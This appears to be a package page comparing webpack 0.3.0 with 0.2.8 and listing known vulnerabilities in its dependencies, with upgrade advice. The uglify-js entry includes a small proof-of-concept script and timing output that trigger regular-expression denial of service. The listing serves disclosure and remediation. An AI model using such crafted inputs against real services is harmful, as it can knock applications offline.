Webpack version 0.3.0 introduces significant changes compared to its predecessor, version 0.2.8, expanding its module loading capabilities. A key difference lies in the dependencies declared. Version 0.3.0 introduces loaders for various file types, including raw-loader, jade-loader, json-loader, and coffee-loader. These additions empower developers to seamlessly integrate a wider array of file formats, such as Jade templates, JSON data, and CoffeeScript code, directly into their JavaScript bundles without needing to pre-compile them separately. These loaders are also listed as optional dependencies, implying that a project doesn't necessarily need configuration for these file types if it doesn't require them. In contrast, version 0.2.8 lacks these specific loaders but includes dependencies like vm-browserify and http-browserify, which are omitted in the newer version, potentially indicating a shift in how webpack handles certain browser-specific functionalities. The upgrade to version 0.3.0 suggests an intent to simplify workflows by supporting common web development assets directly within the module bundling process. Developers utilizing webpack would benefit from the expanded range of loaders, streamlining project setup and improving the integration of diverse assets. Notably, the versions of shared dependencies like esprima, sprintf, optimist, and uglify-js might differ, reflecting updates in those underlying libraries between releases. The addition of file loaders is the defining aspect impacting ease of use.
All the vulnerabilities related to the version 0.3.0 of the package
Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js
Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.
Upgrade UglifyJS to version >= 2.4.24.
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
var u = require('uglify-js');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.
Regular Expression Denial of Service in clean-css
Version of clean-css prior to 4.1.11 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service.
Upgrade to version 4.1.11 or higher.
Sandbox Bypass Leading to Arbitrary Code Execution in constantinople
Versions of constantinople prior to 3.1.1 are vulnerable to a sandbox bypass which can lead to arbitrary code execution.
Update to version 3.1.1 or later.